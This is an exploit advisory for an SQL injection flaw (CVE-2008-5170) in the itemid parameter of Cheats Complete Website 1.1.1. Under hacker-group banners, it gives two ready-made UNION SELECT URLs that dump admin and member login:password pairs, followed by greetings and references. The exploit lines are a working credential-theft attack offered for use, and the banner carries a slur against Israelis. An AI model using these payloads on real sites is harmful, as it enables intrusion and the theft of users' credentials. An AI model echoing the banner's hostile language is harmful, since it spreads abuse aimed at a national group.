 Topic: |
Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability |
| Credit: |
Cyb3r-1sT |
| Date: |
2008.11.22 |
| CWE: |
CWE-89 (Show similar)
|
| CVE: |
CVE-2008-5170 (Show details)
Use CVE to see details like:
- CVSS2,
- Affected Software,
- References |
| Risk |
Local |
| Remote |
| High |
No |
| Yes |
| \ \____/ >> Kings of injection |
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
<<!>> Groups : InjEctOr5 T3am
=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================
<<->> script : Cheats Website
<<->> Demo site : www.easysitenetwork.com/sites/cheats
=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================
<<->> D0rk : N0-WaY
<<->> Exploit :
<!> for admin inf0 ::
>>>>
www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*
<!> for members inf0 ::
>>>>
www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/*
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================
<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $
crazy-x
:: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y
<<->> InjEctOr5 TeaM
<<->> All muslims
References:
http://www.securityfocus.com/bid/29970
http://www.milw0rm.com/exploits/5950
http://secunia.com/advisories/30838
[ ASCII VERSION ]
|
